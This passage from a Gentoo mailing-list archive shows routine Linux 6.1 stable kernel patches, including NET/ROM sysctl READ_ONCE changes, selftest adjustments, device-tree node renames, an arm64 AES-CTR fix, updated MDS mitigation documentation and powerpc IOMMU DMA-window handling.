++	nr->window = READ_ONCE(sysctl_netrom_transport_requested_window_size);
+ 
+ 	nr->bpqext = 1;
+ 	nr->state  = NR_STATE_0;
+@@ -954,7 +954,7 @@ int nr_rx_frame(struct sk_buff *skb, struct net_device *dev)
+ 		 * G8PZT's Xrouter which is sending packets with command type 7
+ 		 * as an extension of the protocol.
+ 		 */
+-		if (sysctl_netrom_reset_circuit &&
++		if (READ_ONCE(sysctl_netrom_reset_circuit) &&
+ 		    (frametype != NR_RESET || flags != 0))
+ 			nr_transmit_reset(skb, 1);
+ 
+diff --git a/net/netrom/nr_dev.c b/net/netrom/nr_dev.c
+index 3aaac4a22b387..2c34389c3ce6f 100644
+--- a/net/netrom/nr_dev.c
++++ b/net/netrom/nr_dev.c
+@@ -81,7 +81,7 @@ static int nr_header(struct sk_buff *skb, struct net_device *dev,
+ 	buff[6] |= AX25_SSSID_SPARE;
+ 	buff    += AX25_ADDR_LEN;
+ 
+-	*buff++ = sysctl_netrom_network_ttl_initialiser;
++	*buff++ = READ_ONCE(sysctl_netrom_network_ttl_initialiser);
+ 
+ 	*buff++ = NR_PROTO_IP;
+ 	*buff++ = NR_PROTO_IP;
+diff --git a/net/netrom/nr_in.c b/net/netrom/nr_in.c
+index 2f084b6f69d7e..97944db6b5ac6 100644
+--- a/net/netrom/nr_in.c
++++ b/net/netrom/nr_in.c
+@@ -97,7 +97,7 @@ static int nr_state1_machine(struct sock *sk, struct sk_buff *skb,
+ 		break;
+ 
+ 	case NR_RESET:
+-		if (sysctl_netrom_reset_circuit)
++		if (READ_ONCE(sysctl_netrom_reset_circuit))
+ 			nr_disconnect(sk, ECONNRESET);
+ 		break;
+ 
+@@ -128,7 +128,7 @@ static int nr_state2_machine(struct sock *sk, struct sk_buff *skb,
+ 		break;
+ 
+ 	case NR_RESET:
+-		if (sysctl_netrom_reset_circuit)
++		if (READ_ONCE(sysctl_netrom_reset_circuit))
+ 			nr_disconnect(sk, ECONNRESET);
+ 		break;
+ 
+@@ -262,7 +262,7 @@ static int nr_state3_machine(struct sock *sk, struct sk_buff *skb, int frametype
+ 		break;
+ 
+ 	case NR_RESET:
+-		if (sysctl_netrom_reset_circuit)
++		if (READ_ONCE(sysctl_netrom_reset_circuit))
+ 			nr_disconnect(sk, ECONNRESET);
+ 		break;
+ 
+diff --git a/net/netrom/nr_out.c b/net/netrom/nr_out.c
+index 44929657f5b71..5e531394a724b 100644
+--- a/net/netrom/nr_out.c
++++ b/net/netrom/nr_out.c
+@@ -204,7 +204,7 @@ void nr_transmit_buffer(struct sock *sk, struct sk_buff *skb)
+ 	dptr[6] |= AX25_SSSID_SPARE;
+ 	dptr += AX25_ADDR_LEN;
+ 
+-	*dptr++ = sysctl_netrom_network_ttl_initialiser;
++	*dptr++ = READ_ONCE(sysctl_netrom_network_ttl_initialiser);
+ 
+ 	if (!nr_route_frame(skb, NULL)) {
+ 		kfree_skb(skb);
+diff --git a/net/netrom/nr_route.c b/net/netrom/nr_route.c
+index baea3cbd76ca5..70480869ad1c5 100644
+--- a/net/netrom/nr_route.c
++++ b/net/netrom/nr_route.c
+@@ -153,7 +153,7 @@ static int __must_check nr_add_node(ax25_address *nr, const char *mnemonic,
+ 		nr_neigh->digipeat = NULL;
+ 		nr_neigh->ax25     = NULL;
+ 		nr_neigh->dev      = dev;
+-		nr_neigh->quality  = sysctl_netrom_default_path_quality;
++		nr_neigh->quality  = READ_ONCE(sysctl_netrom_default_path_quality);
+ 		nr_neigh->locked   = 0;
+ 		nr_neigh->count    = 0;
+ 		nr_neigh->number   = nr_neigh_no++;
+@@ -728,7 +728,7 @@ void nr_link_failed(ax25_cb *ax25, int reason)
+ 	nr_neigh->ax25 = NULL;
+ 	ax25_cb_put(ax25);
+ 
+-	if (++nr_neigh->failed < sysctl_netrom_link_fails_count) {
++	if (++nr_neigh->failed < READ_ONCE(sysctl_netrom_link_fails_count)) {
+ 		nr_neigh_put(nr_neigh);
+ 		return;
+ 	}
+@@ -766,7 +766,7 @@ int nr_route_frame(struct sk_buff *skb, ax25_cb *ax25)
+ 	if (ax25 != NULL) {
+ 		ret = nr_add_node(nr_src, "", &ax25->dest_addr, ax25->digipeat,
+ 				  ax25->ax25_dev->dev, 0,
+-				  sysctl_netrom_obsolescence_count_initialiser);
++				  READ_ONCE(sysctl_netrom_obsolescence_count_initialiser));
+ 		if (ret)
+ 			return ret;
+ 	}
+@@ -780,7 +780,7 @@ int nr_route_frame(struct sk_buff *skb, ax25_cb *ax25)
+ 		return ret;
+ 	}
+ 
+-	if (!sysctl_netrom_routing_control && ax25 != NULL)
++	if (!READ_ONCE(sysctl_netrom_routing_control) && ax25 != NULL)
+ 		return 0;
+ 
+ 	/* Its Time-To-Live has expired */
+diff --git a/net/netrom/nr_subr.c b/net/netrom/nr_subr.c
+index e2d2af924cff4..c3bbd5880850b 100644
+--- a/net/netrom/nr_subr.c
++++ b/net/netrom/nr_subr.c
+@@ -182,7 +182,8 @@ void nr_write_internal(struct sock *sk, int frametype)
+ 		*dptr++ = nr->my_id;
+ 		*dptr++ = frametype;
+ 		*dptr++ = nr->window;
+-		if (nr->bpqext) *dptr++ = sysctl_netrom_network_ttl_initialiser;
++		if (nr->bpqext)
++			*dptr++ = READ_ONCE(sysctl_netrom_network_ttl_initialiser);
+ 		break;
+ 
+ 	case NR_DISCREQ:
+@@ -236,7 +237,7 @@ void __nr_transmit_reply(struct sk_buff *skb, int mine, unsigned char cmdflags)
+ 	dptr[6] |= AX25_SSSID_SPARE;
+ 	dptr += AX25_ADDR_LEN;
+ 
+-	*dptr++ = sysctl_netrom_network_ttl_initialiser;
++	*dptr++ = READ_ONCE(sysctl_netrom_network_ttl_initialiser);
+ 
+ 	if (mine) {
+ 		*dptr++ = 0;
+diff --git a/net/rds/rdma.c b/net/rds/rdma.c
+index fba82d36593ad..a4e3c5de998be 100644
+--- a/net/rds/rdma.c
++++ b/net/rds/rdma.c
+@@ -301,6 +301,9 @@ static int __rds_rdma_map(struct rds_sock *rs, struct rds_get_mr_args *args,
+ 			kfree(sg);
+ 		}
+ 		ret = PTR_ERR(trans_private);
++		/* Trigger connection so that its ready for the next retry */
++		if (ret == -ENODEV)
++			rds_conn_connect_if_down(cp->cp_conn);
+ 		goto out;
+ 	}
+ 
+diff --git a/net/rds/send.c b/net/rds/send.c
+index 0c5504068e3c2..a4ba45c430d81 100644
+--- a/net/rds/send.c
++++ b/net/rds/send.c
+@@ -1314,12 +1314,8 @@ int rds_sendmsg(struct socket *sock, struct msghdr *msg, size_t payload_len)
+ 
+ 	/* Parse any control messages the user may have included. */
+ 	ret = rds_cmsg_send(rs, rm, msg, &allocated_mr, &vct);
+-	if (ret) {
+-		/* Trigger connection so that its ready for the next retry */
+-		if (ret ==  -EAGAIN)
+-			rds_conn_connect_if_down(conn);
++	if (ret)
+ 		goto out;
+-	}
+ 
+ 	if (rm->rdma.op_active && !conn->c_trans->xmit_rdma) {
+ 		printk_ratelimited(KERN_NOTICE "rdma_op %p conn xmit_rdma %p\n",
+diff --git a/sound/soc/codecs/wcd938x.c b/sound/soc/codecs/wcd938x.c
+index e80be4e4fa8b4..555b74e7172d8 100644
+--- a/sound/soc/codecs/wcd938x.c
++++ b/sound/soc/codecs/wcd938x.c
+@@ -210,7 +210,7 @@ struct wcd938x_priv {
+ };
+ 
+ static const SNDRV_CTL_TLVD_DECLARE_DB_MINMAX(ear_pa_gain, 600, -1800);
+-static const DECLARE_TLV_DB_SCALE(line_gain, -3000, 150, -3000);
++static const DECLARE_TLV_DB_SCALE(line_gain, -3000, 150, 0);
+ static const SNDRV_CTL_TLVD_DECLARE_DB_MINMAX(analog_gain, 0, 3000);
+ 
+ struct wcd938x_mbhc_zdet_param {
+diff --git a/tools/testing/selftests/net/mptcp/simult_flows.sh b/tools/testing/selftests/net/mptcp/simult_flows.sh
+index 4a417f9d51d67..06ad0510469e3 100755
+--- a/tools/testing/selftests/net/mptcp/simult_flows.sh
++++ b/tools/testing/selftests/net/mptcp/simult_flows.sh
+@@ -301,10 +301,10 @@ done
+ 
+ setup
+ run_test 10 10 0 0 "balanced bwidth"
+-run_test 10 10 1 50 "balanced bwidth with unbalanced delay"
++run_test 10 10 1 25 "balanced bwidth with unbalanced delay"
+ 
+ # we still need some additional infrastructure to pass the following test-cases
+-run_test 30 10 0 0 "unbalanced bwidth"
+-run_test 30 10 1 50 "unbalanced bwidth with unbalanced delay"
+-run_test 30 10 50 1 "unbalanced bwidth with opposed, unbalanced delay"
++run_test 10 3 0 0 "unbalanced bwidth"
++run_test 10 3 1 25 "unbalanced bwidth with unbalanced delay"
++run_test 10 3 25 1 "unbalanced bwidth with opposed, unbalanced delay"
+ exit $ret
+diff --git a/tools/testing/selftests/vm/charge_reserved_hugetlb.sh b/tools/testing/selftests/vm/charge_reserved_hugetlb.sh
+index 0899019a7fcb4..e14bdd4455f2d 100644
+--- a/tools/testing/selftests/vm/charge_reserved_hugetlb.sh
++++ b/tools/testing/selftests/vm/charge_reserved_hugetlb.sh
+@@ -1,4 +1,4 @@
+-#!/bin/sh
++#!/bin/bash
+ # SPDX-License-Identifier: GPL-2.0
+ 
+ # Kselftest framework requirement - SKIP code is 4.
+diff --git a/tools/testing/selftests/vm/map_hugetlb.c b/tools/testing/selftests/vm/map_hugetlb.c
+index 312889edb84ab..c65c55b7a789f 100644
+--- a/tools/testing/selftests/vm/map_hugetlb.c
++++ b/tools/testing/selftests/vm/map_hugetlb.c
+@@ -15,6 +15,7 @@
+ #include <unistd.h>
+ #include <sys/mman.h>
+ #include <fcntl.h>
++#include "vm_util.h"
+ 
+ #define LENGTH (256UL*1024*1024)
+ #define PROTECTION (PROT_READ | PROT_WRITE)
+@@ -70,10 +71,16 @@ int main(int argc, char **argv)
+ {
+ 	void *addr;
+ 	int ret;
++	size_t hugepage_size;
+ 	size_t length = LENGTH;
+ 	int flags = FLAGS;
+ 	int shift = 0;
+ 
++	hugepage_size = default_huge_page_size();
++	/* munmap with fail if the length is not page aligned */
++	if (hugepage_size > length)
++		length = hugepage_size;
++
+ 	if (argc > 1)
+ 		length = atol(argv[1]) << 20;
+ 	if (argc > 2) {
+diff --git a/tools/testing/selftests/vm/write_hugetlb_memory.sh b/tools/testing/selftests/vm/write_hugetlb_memory.sh
+index 70a02301f4c27..3d2d2eb9d6fff 100644
+--- a/tools/testing/selftests/vm/write_hugetlb_memory.sh
++++ b/tools/testing/selftests/vm/write_hugetlb_memory.sh
+@@ -1,4 +1,4 @@
+-#!/bin/sh
++#!/bin/bash
+ # SPDX-License-Identifier: GPL-2.0
+ 
+ set -e


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-03-06 18:07 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-03-06 18:07 UTC (permalink / raw
  To: gentoo-commits

commit:     8bc8ef53218c6b5ef66b10198d58003c5a0a0397
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Mar  6 18:07:47 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Mar  6 18:07:47 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=8bc8ef53

Linuxpatch 6.1.81

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1080_linux-6.1.81.patch | 14458 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 14462 insertions(+)

diff --git a/0000_README b/0000_README
index 0bde520b..d0f067de 100644
--- a/0000_README
+++ b/0000_README
@@ -363,6 +363,10 @@ Patch:  1079_linux-6.1.80.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.80
 
+Patch:  1080_linux-6.1.81.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.81
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1080_linux-6.1.81.patch b/1080_linux-6.1.81.patch
new file mode 100644
index 00000000..59f3b367
--- /dev/null
+++ b/1080_linux-6.1.81.patch
@@ -0,0 +1,14458 @@
+diff --git a/Documentation/x86/boot.rst b/Documentation/x86/boot.rst
+index 894a198970055..bac3789f3e8fa 100644
+--- a/Documentation/x86/boot.rst
++++ b/Documentation/x86/boot.rst
+@@ -1416,7 +1416,7 @@ execution context provided by the EFI firmware.
+ 
+ The function prototype for the handover entry point looks like this::
+ 
+-    efi_main(void *handle, efi_system_table_t *table, struct boot_params *bp)
++    efi_stub_entry(void *handle, efi_system_table_t *table, struct boot_params *bp)
+ 
+ 'handle' is the EFI image handle passed to the boot loader by the EFI
+ firmware, 'table' is the EFI system table - these are the first two
+diff --git a/Documentation/x86/mds.rst b/Documentation/x86/mds.rst
+index 5d4330be200f9..e801df0bb3a81 100644
+--- a/Documentation/x86/mds.rst
++++ b/Documentation/x86/mds.rst
+@@ -95,6 +95,9 @@ The kernel provides a function to invoke the buffer clearing:
+ 
+     mds_clear_cpu_buffers()
+ 
++Also macro CLEAR_CPU_BUFFERS can be used in ASM late in exit-to-user path.
++Other than CFLAGS.ZF, this macro doesn't clobber any registers.
++
+ The mitigation is invoked on kernel/userspace, hypervisor/guest and C-state
+ (idle) transitions.
+ 
+@@ -138,17 +141,30 @@ Mitigation points
+ 
+    When transitioning from kernel to user space the CPU buffers are flushed
+    on affected CPUs when the mitigation is not disabled on the kernel
+-   command line. The migitation is enabled through the static key
+-   mds_user_clear.
+-
+-   The mitigation is invoked in prepare_exit_to_usermode() which covers
+-   all but one of the kernel to user space transitions.  The exception
+-   is when we return from a Non Maskable Interrupt (NMI), which is
+-   handled directly in do_nmi().
+-
+-   (The reason that NMI is special is that prepare_exit_to_usermode() can
+-    enable IRQs.  In NMI context, NMIs are blocked, and we don't want to
+-    enable IRQs with NMIs blocked.)
++   command line. The mitigation is enabled through the feature flag
++   X86_FEATURE_CLEAR_CPU_BUF.
++
++   The mitigation is invoked just before transitioning to userspace after
++   user registers are restored. This is done to minimize the window in
++   which kernel data could be accessed after VERW e.g. via an NMI after
++   VERW.
++
++   **Corner case not handled**
++   Interrupts returning to kernel don't clear CPUs buffers since the
++   exit-to-user path is expected to do that anyways. But, there could be
++   a case when an NMI is generated in kernel after the exit-to-user path
++   has cleared the buffers. This case is not handled and NMI returning to
++   kernel don't clear CPU buffers because:
++
++   1. It is rare to get an NMI after VERW, but before returning to userspace.
++   2. For an unprivileged user, there is no known way to make that NMI
++      less rare or target it.
++   3. It would take a large number of these precisely-timed NMIs to mount
++      an actual attack.  There's presumably not enough bandwidth.
++   4. The NMI in question occurs after a VERW, i.e. when user state is
++      restored and most interesting data is already scrubbed. Whats left
++      is only the data that NMI touches, and that may or may not be of
++      any interest.
+ 
+ 
+ 2. C-State transition
+diff --git a/MAINTAINERS b/MAINTAINERS
+index 13d1078808bb5..bbfedb0b20938 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -10051,6 +10051,7 @@ F:	drivers/infiniband/
+ F:	include/rdma/
+ F:	include/trace/events/ib_mad.h
+ F:	include/trace/events/ib_umad.h
++F:	include/trace/misc/rdma.h
+ F:	include/uapi/linux/if_infiniband.h
+ F:	include/uapi/rdma/
+ F:	samples/bpf/ibumad_kern.c
+@@ -11139,6 +11140,12 @@ F:	fs/nfs_common/
+ F:	fs/nfsd/
+ F:	include/linux/lockd/
+ F:	include/linux/sunrpc/
++F:	include/trace/events/rpcgss.h
++F:	include/trace/events/rpcrdma.h
++F:	include/trace/events/sunrpc.h
++F:	include/trace/misc/fs.h
++F:	include/trace/misc/nfs.h
++F:	include/trace/misc/sunrpc.h
+ F:	include/uapi/linux/nfsd/
+ F:	include/uapi/linux/sunrpc/
+ F:	net/sunrpc/
+diff --git a/Makefile b/Makefile
+index bc4adb561a7cf..e13df565a1cb6 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 80
++SUBLEVEL = 81
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/imx23.dtsi b/arch/arm/boot/dts/imx23.dtsi
+index ec476b1596496..b236d23f80715 100644
+--- a/arch/arm/boot/dts/imx23.dtsi
++++ b/arch/arm/boot/dts/imx23.dtsi
+@@ -59,7 +59,7 @@ icoll: interrupt-controller@80000000 {
+ 				reg = <0x80000000 0x2000>;
+ 			};
+ 
+-			dma_apbh: dma-apbh@80004000 {
++			dma_apbh: dma-controller@80004000 {
+ 				compatible = "fsl,imx23-dma-apbh";
+ 				reg = <0x80004000 0x2000>;
+ 				interrupts = <0 14 20 0
+diff --git a/arch/arm/boot/dts/imx28.dtsi b/arch/arm/boot/dts/imx28.dtsi
+index b15df16ecb01a..b81592a613112 100644
+--- a/arch/arm/boot/dts/imx28.dtsi
++++ b/arch/arm/boot/dts/imx28.dtsi
+@@ -78,7 +78,7 @@ hsadc: hsadc@80002000 {
+ 				status = "disabled";
+ 			};
+ 
+-			dma_apbh: dma-apbh@80004000 {
++			dma_apbh: dma-controller@80004000 {
+ 				compatible = "fsl,imx28-dma-apbh";
+ 				reg = <0x80004000 0x2000>;
+ 				interrupts = <82 83 84 85
+diff --git a/arch/arm/boot/dts/imx6qdl.dtsi b/arch/arm/boot/dts/imx6qdl.dtsi
+index ff1e0173b39be..2c6eada01d792 100644
+--- a/arch/arm/boot/dts/imx6qdl.dtsi
++++ b/arch/arm/boot/dts/imx6qdl.dtsi
+@@ -150,7 +150,7 @@ soc: soc {
+ 		interrupt-parent = <&gpc>;
+ 		ranges;
+ 
+-		dma_apbh: dma-apbh@110000 {
++		dma_apbh: dma-controller@110000 {
+ 			compatible = "fsl,imx6q-dma-apbh", "fsl,imx28-dma-apbh";
+ 			reg = <0x00110000 0x2000>;
+ 			interrupts = <0 13 IRQ_TYPE_LEVEL_HIGH>,
+diff --git a/arch/arm/boot/dts/imx6sx.dtsi b/arch/arm/boot/dts/imx6sx.dtsi
+index 1f1053a898fbf..67d344ae76b51 100644
+--- a/arch/arm/boot/dts/imx6sx.dtsi
++++ b/arch/arm/boot/dts/imx6sx.dtsi
+@@ -209,7 +209,7 @@ gpu: gpu@1800000 {
+ 			power-domains = <&pd_pu>;
+ 		};
+ 
+-		dma_apbh: dma-apbh@1804000 {
++		dma_apbh: dma-controller@1804000 {
+ 			compatible = "fsl,imx6sx-dma-apbh", "fsl,imx28-dma-apbh";
+ 			reg = <0x01804000 0x2000>;
+ 			interrupts = <GIC_SPI 13 IRQ_TYPE_LEVEL_HIGH>,
+diff --git a/arch/arm/boot/dts/imx6ul.dtsi b/arch/arm/boot/dts/imx6ul.dtsi
+index 2b5996395701a..aac081b6daaac 100644
+--- a/arch/arm/boot/dts/imx6ul.dtsi
++++ b/arch/arm/boot/dts/imx6ul.dtsi
+@@ -164,7 +164,7 @@ intc: interrupt-controller@a01000 {
+ 			      <0x00a06000 0x2000>;
+ 		};
+ 
+-		dma_apbh: dma-apbh@1804000 {
++		dma_apbh: dma-controller@1804000 {
+ 			compatible = "fsl,imx6q-dma-apbh", "fsl,imx28-dma-apbh";
+ 			reg = <0x01804000 0x2000>;
+ 			interrupts = <0 13 IRQ_TYPE_LEVEL_HIGH>,
+diff --git a/arch/arm/boot/dts/imx7s.dtsi b/arch/arm/boot/dts/imx7s.dtsi
+index 4b23630fc738d..69aebc691526f 100644
+--- a/arch/arm/boot/dts/imx7s.dtsi
++++ b/arch/arm/boot/dts/imx7s.dtsi
+@@ -1267,14 +1267,13 @@ fec1: ethernet@30be0000 {
+ 			};
+ 		};
+ 
+-		dma_apbh: dma-apbh@33000000 {
++		dma_apbh: dma-controller@33000000 {
+ 			compatible = "fsl,imx7d-dma-apbh", "fsl,imx28-dma-apbh";
+ 			reg = <0x33000000 0x2000>;
+ 			interrupts = <GIC_SPI 12 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 12 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 12 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 12 IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "gpmi0", "gpmi1", "gpmi2", "gpmi3";
+ 			#dma-cells = <1>;
+ 			dma-channels = <4>;
+ 			clocks = <&clks IMX7D_NAND_USDHC_BUS_RAWNAND_CLK>;
+diff --git a/arch/arm64/crypto/aes-neonbs-glue.c b/arch/arm64/crypto/aes-neonbs-glue.c
+index bac4cabef6073..467ac2f768ac2 100644
+--- a/arch/arm64/crypto/aes-neonbs-glue.c
++++ b/arch/arm64/crypto/aes-neonbs-glue.c
+@@ -227,8 +227,19 @@ static int ctr_encrypt(struct skcipher_request *req)
+ 			src += blocks * AES_BLOCK_SIZE;
+ 		}
+ 		if (nbytes && walk.nbytes == walk.total) {
++			u8 buf[AES_BLOCK_SIZE];
++			u8 *d = dst;
++
++			if (unlikely(nbytes < AES_BLOCK_SIZE))
++				src = dst = memcpy(buf + sizeof(buf) - nbytes,
++						   src, nbytes);
++
+ 			neon_aes_ctr_encrypt(dst, src, ctx->enc, ctx->key.rounds,
+ 					     nbytes, walk.iv);
++
++			if (unlikely(nbytes < AES_BLOCK_SIZE))
++				memcpy(d, dst, nbytes);
++
+ 			nbytes = 0;
+ 		}
+ 		kernel_neon_end();
+diff --git a/arch/arm64/include/asm/efi.h b/arch/arm64/include/asm/efi.h
+index 62c846be2d76a..a75c0772ecfca 100644
+--- a/arch/arm64/include/asm/efi.h
++++ b/arch/arm64/include/asm/efi.h
+@@ -103,6 +103,7 @@ static inline void free_screen_info(struct screen_info *si)
+ }
+ 
+ #define EFI_ALLOC_ALIGN		SZ_64K
++#define EFI_ALLOC_LIMIT		((1UL << 48) - 1)
+ 
+ /*
+  * On ARM systems, virtually remapped UEFI runtime services are set up in two
+diff --git a/arch/powerpc/platforms/pseries/iommu.c b/arch/powerpc/platforms/pseries/iommu.c
+index 97b026130c71b..1e5f083cdb720 100644
+--- a/arch/powerpc/platforms/pseries/iommu.c
++++ b/arch/powerpc/platforms/pseries/iommu.c
+@@ -569,29 +569,6 @@ static void iommu_table_setparms(struct pci_controller *phb,
+ 
+ struct iommu_table_ops iommu_table_lpar_multi_ops;
+ 
+-/*
+- * iommu_table_setparms_lpar
+- *
+- * Function: On pSeries LPAR systems, return TCE table info, given a pci bus.
+- */
+-static void iommu_table_setparms_lpar(struct pci_controller *phb,
+-				      struct device_node *dn,
+-				      struct iommu_table *tbl,
+-				      struct iommu_table_group *table_group,
+-				      const __be32 *dma_window)
+-{
+-	unsigned long offset, size, liobn;
+-
+-	of_parse_dma_window(dn, dma_window, &liobn, &offset, &size);
+-
+-	iommu_table_setparms_common(tbl, phb->bus->number, liobn, offset, size, IOMMU_PAGE_SHIFT_4K, NULL,
+-				    &iommu_table_lpar_multi_ops);
+-
+-
+-	table_group->tce32_start = offset;
+-	table_group->tce32_size = size;
+-}
+-
+ struct iommu_table_ops iommu_table_pseries_ops = {
+ 	.set = tce_build_pSeries,
+ 	.clear = tce_free_pSeries,
+@@ -719,26 +696,71 @@ struct iommu_table_ops iommu_table_lpar_multi_ops = {
+  * dynamic 64bit DMA window, walking up the device tree.
+  */
+ static struct device_node *pci_dma_find(struct device_node *dn,
+-					const __be32 **dma_window)
++					struct dynamic_dma_window_prop *prop)
+ {
+-	const __be32 *dw = NULL;
++	const __be32 *default_prop = NULL;
++	const __be32 *ddw_prop = NULL;
++	struct device_node *rdn = NULL;
++	bool default_win = false, ddw_win = false;
+ 
+ 	for ( ; dn && PCI_DN(dn); dn = dn->parent) {
+-		dw = of_get_property(dn, "ibm,dma-window", NULL);
+-		if (dw) {
+-			if (dma_window)
+-				*dma_window = dw;
+-			return dn;
++		default_prop = of_get_property(dn, "ibm,dma-window", NULL);
++		if (default_prop) {
++			rdn = dn;
++			default_win = true;
++		}
++		ddw_prop = of_get_property(dn, DIRECT64_PROPNAME, NULL);
++		if (ddw_prop) {
++			rdn = dn;
++			ddw_win = true;
++			break;
++		}
++		ddw_prop = of_get_property(dn, DMA64_PROPNAME, NULL);
++		if (ddw_prop) {
++			rdn = dn;
++			ddw_win = true;
++			break;
+ 		}
+-		dw = of_get_property(dn, DIRECT64_PROPNAME, NULL);
+-		if (dw)
+-			return dn;
+-		dw = of_get_property(dn, DMA64_PROPNAME, NULL);
+-		if (dw)
+-			return dn;
++
++		/* At least found default window, which is the case for normal boot */
++		if (default_win)
++			break;
+ 	}
+ 
+-	return NULL;
++	/* For PCI devices there will always be a DMA window, either on the device
++	 * or parent bus
++	 */
++	WARN_ON(!(default_win | ddw_win));
++
++	/* caller doesn't want to get DMA window property */
++	if (!prop)
++		return rdn;
++
++	/* parse DMA window property. During normal system boot, only default
++	 * DMA window is passed in OF. But, for kdump, a dedicated adapter might
++	 * have both default and DDW in FDT. In this scenario, DDW takes precedence
++	 * over default window.
++	 */
++	if (ddw_win) {
++		struct dynamic_dma_window_prop *p;
++
++		p = (struct dynamic_dma_window_prop *)ddw_prop;
++		prop->liobn = p->liobn;
++		prop->dma_base = p->dma_base;
++		prop->tce_shift = p->tce_shift;
++		prop->window_shift = p->window_shift;
++	} else if (default_win) {
++		unsigned long offset, size, liobn;
++
++		of_parse_dma_window(rdn, default_prop, &liobn, &offset, &size);
++
++		prop->liobn = cpu_to_be32((u32)liobn);
++		prop->dma_base = cpu_to_be64(offset);
++		prop->tce_shift = cpu_to_be32(IOMMU_PAGE_SHIFT_4K);
++		prop->window_shift = cpu_to_be32(order_base_2(size));
++	}
++
++	return rdn;
+ }
+ 
+ static void pci_dma_bus_setup_pSeriesLP(struct pci_bus *bus)
+@@ -746,17 +768,20 @@ static void pci_dma_bus_setup_pSeriesLP(struct pci_bus *bus)
+ 	struct iommu_table *tbl;
+ 	struct device_node *dn, *pdn;
+ 	struct pci_dn *ppci;
+-	const __be32 *dma_window = NULL;
++	struct dynamic_dma_window_prop prop;
+ 
+ 	dn = pci_bus_to_OF_node(bus);
+ 
+ 	pr_debug("pci_dma_bus_setup_pSeriesLP: setting up bus %pOF\n",
+ 		 dn);
+ 
+-	pdn = pci_dma_find(dn, &dma_window);
++	pdn = pci_dma_find(dn, &prop);
+ 
+-	if (dma_window == NULL)
+-		pr_debug("  no ibm,dma-window property !\n");
++	/* In PPC architecture, there will always be DMA window on bus or one of the
++	 * parent bus. During reboot, there will be ibm,dma-window property to
++	 * define DMA window. For kdump, there will at least be default window or DDW
++	 * or both.
++	 */
+ 
+ 	ppci = PCI_DN(pdn);
+ 
+@@ -766,13 +791,24 @@ static void pci_dma_bus_setup_pSeriesLP(struct pci_bus *bus)
+ 	if (!ppci->table_group) {
+ 		ppci->table_group = iommu_pseries_alloc_group(ppci->phb->node);
+ 		tbl = ppci->table_group->tables[0];
+-		if (dma_window) {
+-			iommu_table_setparms_lpar(ppci->phb, pdn, tbl,
+-						  ppci->table_group, dma_window);
+ 
+-			if (!iommu_init_table(tbl, ppci->phb->node, 0, 0))
+-				panic("Failed to initialize iommu table");
+-		}
++		iommu_table_setparms_common(tbl, ppci->phb->bus->number,
++				be32_to_cpu(prop.liobn),
++				be64_to_cpu(prop.dma_base),
++				1ULL << be32_to_cpu(prop.window_shift),
++				be32_to_cpu(prop.tce_shift), NULL,
++				&iommu_table_lpar_multi_ops);
++
++		/* Only for normal boot with default window. Doesn't matter even
++		 * if we set these with DDW which is 64bit during kdump, since
++		 * these will not be used during kdump.
++		 */
++		ppci->table_group->tce32_start = be64_to_cpu(prop.dma_base);
++		ppci->table_group->tce32_size = 1 << be32_to_cpu(prop.window_shift);
++
++		if (!iommu_init_table(tbl, ppci->phb->node, 0, 0))
++			panic("Failed to initialize iommu table");
++
+ 		iommu_register_group(ppci->table_group,
+ 				pci_domain_nr(bus), 0);
+ 		pr_debug("  created table: %p\n", ppci->table_group);
+@@ -960,6 +996,12 @@ static void find_existing_ddw_windows_named(const char *name)
+ 			continue;
+ 		}
+ 
++		/* If at the time of system initialization, there are DDWs in OF,
++		 * it means this is during kexec. DDW could be direct or dynamic.
++		 * We will just mark DDWs as "dynamic" since this is kdump path,
++		 * no need to worry about perforance. ddw_list_new_entry() will
++		 * set window->direct = false.
++		 */
+ 		window = ddw_list_new_entry(pdn, dma64);
+ 		if (!window) {
+ 			of_node_put(pdn);
+@@ -1525,8 +1567,8 @@ static void pci_dma_dev_setup_pSeriesLP(struct pci_dev *dev)
+ {
+ 	struct device_node *pdn, *dn;
+ 	struct iommu_table *tbl;
+-	const __be32 *dma_window = NULL;
+ 	struct pci_dn *pci;
++	struct dynamic_dma_window_prop prop;
+ 
+ 	pr_debug("pci_dma_dev_setup_pSeriesLP: %s\n", pci_name(dev));
+ 
+@@ -1539,7 +1581,7 @@ static void pci_dma_dev_setup_pSeriesLP(struct pci_dev *dev)
+ 	dn = pci_device_to_OF_node(dev);
+ 	pr_debug("  node is %pOF\n", dn);
+ 
+-	pdn = pci_dma_find(dn, &dma_window);
++	pdn = pci_dma_find(dn, &prop);
+ 	if (!pdn || !PCI_DN(pdn)) {
+ 		printk(KERN_WARNING "pci_dma_dev_setup_pSeriesLP: "
+ 		       "no DMA window found for pci dev=%s dn=%pOF\n",
+@@ -1552,8 +1594,20 @@ static void pci_dma_dev_setup_pSeriesLP(struct pci_dev *dev)
+ 	if (!pci->table_group) {
+ 		pci->table_group = iommu_pseries_alloc_group(pci->phb->node);
+ 		tbl = pci->table_group->tables[0];
+-		iommu_table_setparms_lpar(pci->phb, pdn, tbl,
+-				pci->table_group, dma_window);
++
